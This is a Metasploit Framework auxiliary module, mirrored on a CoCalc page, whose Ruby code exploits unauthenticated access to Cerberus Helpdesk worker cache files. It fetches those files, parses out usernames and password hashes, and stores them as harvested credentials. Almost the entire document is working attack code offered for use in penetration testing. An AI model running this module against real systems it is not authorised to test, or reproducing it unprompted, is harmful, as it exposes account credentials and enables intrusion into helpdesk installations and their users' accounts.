Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb
19722 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Scanner

9
  include Msf::Auxiliary::Report

10


11
  def initialize

12
    super(

13
      'Name' => 'Cerberus Helpdesk User Hash Disclosure',

14
      'Description' => %q{

15
        This module extracts usernames and password hashes from the Cerberus Helpdesk

16
        through an unauthenticated access to a workers file.

17
        Verified on Version 4.2.3 Stable (Build 925) and 5.4.4

18
        },

19
      'References' => [

20
        [ 'EDB', '39526' ]

21
      ],

22
      'Author' => [

23
        'asdizzle_', # discovery

24
        'h00die', # module

25
      ],

26
      'License' => MSF_LICENSE,

27
      'DisclosureDate' => 'Mar 7 2016'

28
    )

29


30
    register_options(

31
      [

32
        OptString.new('TARGETURI', [false, 'URL of the Cerberus Helpdesk root', '/'])

33
      ]

34
    )

35
  end

36


37
  def run_host(rhost)

38
    begin

39
      ['devblocks', 'zend'].each do |site|

40
        url = normalize_uri(datastore['TARGETURI'], 'storage', 'tmp', "#{site}_cache---ch_workers")

41
        vprint_status("Attempting to load data from #{url}")

42
        res = send_request_cgi({ 'uri' => url })

43
        if !res

44
          print_error("#{peer} Unable to connect to #{url}")

45
          next

46
        end

47


48
        if !res.body.include?('pass')

49
          print_error("Invalid response received for #{peer} for #{url}")

50
          next

51
        end

52


53
        cred_table = Rex::Text::Table.new 'Header' => 'Cerberus Helpdesk User Credentials',

54
                                          'Indent' => 1,

55
                                          'Columns' => ['Username', 'Password Hash']

56


57
        # the returned object looks json-ish, but it isn't. Unsure of format, so we'll do some ugly manual parsing.

58
        # this will be a rough equivalent to sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g'

59
        result = res.body.split('s:5')

60
        result.each do |cred|

61
          if cred.include?('email')

62
            cred = cred.split(':')

63
            username = cred[3].tr('";', '') # remove extra characters

64
            username = username[0...-1] # also remove trailing s

65
            password_hash = cred[7].tr('";', '') # remove extra characters

66
            print_good("Found: #{username}:#{password_hash}")

67
            store_valid_credential(

68
              user: username,

69
              private: password_hash,

70
              private_type: :nonreplayable_hash

71
            )

72
            cred_table << [username, password_hash]

73
          end

74
        end

75
        print_line

76
        print_line cred_table.to_s

77
        break

78
      end

79
    rescue ::Rex::ConnectionError

80
      print_error("#{peer} Unable to connect to site")

81
      return

82
    end

83
  end

84
end

85


86